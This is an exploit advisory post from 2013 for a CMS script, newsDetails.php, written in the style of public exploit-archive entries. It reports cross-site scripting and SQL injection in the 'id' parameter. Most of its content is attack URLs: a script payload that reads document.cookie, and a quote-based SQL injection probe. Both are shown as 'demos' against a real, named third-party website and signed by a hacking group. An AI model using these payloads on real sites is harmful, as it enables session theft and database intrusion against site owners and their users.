facebook facebook twitter rss

cnzz CMS (newsDetails.php) XSS | SQLi

Author: JoKeR_StEx , Published: 19-12-2013
##################################################################################

[~] Exploit Title : cnzz CMS (newsDetails.php) XSS | SQLi
[~] Author : JoKeR_StEx
[~] Tested on : WinXP Pro SP3
[~] Version : 1.2
[~] Software Link : http://www.cnzz.com/
[~] Date : 18/12/2013

##################################################################################

###############
# JoKeR_StEx #
###############

####################################################################################

1| The First Vulnerability is XSS

http://site/en/newsDetails.php?id=[XSS]

#Demo

http://www.ippotour.gr/en/newsDetails.php?id="><script>alert(document.cookie)</script>


2| Sql injection


http://site/en/newsDetails.php?id=2[Sqli]

#Demo

http://www.ippotour.gr/en/newsDetails.php?id=2'

## The #End :)

#####################################################################################
# eXPLOIT BY JoKeR_StEx <3 Dz Crazy L33ts <3 Algeria
# The Black Devils
# Sec W0rms
#####################################################################################

Like us on Facebook :